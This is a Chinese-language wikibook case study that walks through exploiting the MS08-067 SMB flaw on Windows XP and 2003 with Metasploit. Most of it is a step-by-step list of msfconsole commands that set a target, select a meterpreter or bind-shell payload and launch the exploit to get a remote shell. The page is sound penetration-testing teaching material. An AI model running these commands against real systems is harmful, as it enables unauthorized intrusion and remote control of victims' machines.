跳轉到內容

Metasploit/案例研究

來自華夏公益教科書

使用 Metasploit 進行簡單的手動利用

[編輯 | 編輯原始碼]

假設

  • 您正在使用 Metasploit 的最新版本和漏洞利用(svn/subversion)
  • 目標機器是執行 Windows XP(SP1、SP2、SP3)或 Windows 2003(SP0)的 Windows 機器
  • 目標機器的 445 埠已開啟(透過 nmap -p 445 <目標機器的 IP> 檢查)


步驟

  • 1. 載入 Metasploit 的 msfconsole
  • 2. msf > info exploit/windows/smb/ms08_067_netapi
  • 3. msf> use exploit/windows/smb/ms08_067_netapi
  • 4. msf exploit(ms08_067_netapi) > show options
  • 5. msf exploit(ms08_067_netapi) > set RHOST <目標 IP>
  • 6. msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
  • !您可以使用 generic/shell_bind_tcp 作為有效負載以獲得命令提示符。
  • 7. msf exploit(ms08_067_netapi) > set TARGET <選擇與 'show targets' 命令給出的 ID 相對應的目標>。
  • 8. msf exploit(ms08_067_netapi) > exploit


如果一切順利,您將獲得一個 Meterpreter shell。從那裡開始,您可以執行後期利用操作(在後期利用活動中解釋 |https://wikibook.tw/wiki/Metasploit/post_exploitation

使用 MS08_067_Netapi 的影片指南
http://guides.intern0t.net/msf1.php

華夏公益教科書